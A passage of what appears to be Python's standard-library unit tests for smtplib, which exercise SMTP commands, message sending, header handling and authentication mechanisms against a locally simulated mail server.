self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('[email protected]'), expected)
self.assertEqual(smtp.verify('[email protected]'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<[email protected]>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'[email protected]'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='[email protected]', to_addrs='[email protected]')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'[email protected]'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = '[email protected]'
m['Resent-To'] = 'Martha <[email protected]>, Jeff'
m['Resent-Bcc'] = '[email protected]'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('[email protected]', 'Jeff', '[email protected]'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = '[email protected]'
m['Resent-To'] = 'Martha <[email protected]>, Jeff'
m['Resent-Bcc'] = '[email protected]'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = '[email protected]'
m['Resent-From'] = 'Martha <[email protected]>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <fő[email protected]>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = socket_helper.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'[email protected]':'John A',
'[email protected]':'Sally B',
'[email protected]':'Ruth C',
}
sim_auth = ('[email protected]', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['[email protected]','[email protected]'],
'list-2':['[email protected]',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_buggy(self, arg=None):
# This AUTH mechanism will 'trap' client in a neverending 334
# base64 encoded 'BuGgYbUgGy'
self.push('334 QnVHZ1liVWdHeQ==')
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = '[email protected]'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN_initial_response_ok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=True)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_LOGIN_initial_response_notok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=False)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_BUGGY(self):
self.serv.add_feature("AUTH BUGGY")
def auth_buggy(challenge=None):
self.assertEqual(b"BuGgYbUgGy", challenge)
return "\0"
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT
)
try:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_buggy")
expect = r"^Server AUTH mechanism infinite loop.*"
with self.assertRaisesRegex(smtplib.SMTPException, expect) as cm:
smtp.auth("BUGGY", auth_buggy, initial_response_ok=False)
finally:
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('[email protected]', ['[email protected]'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
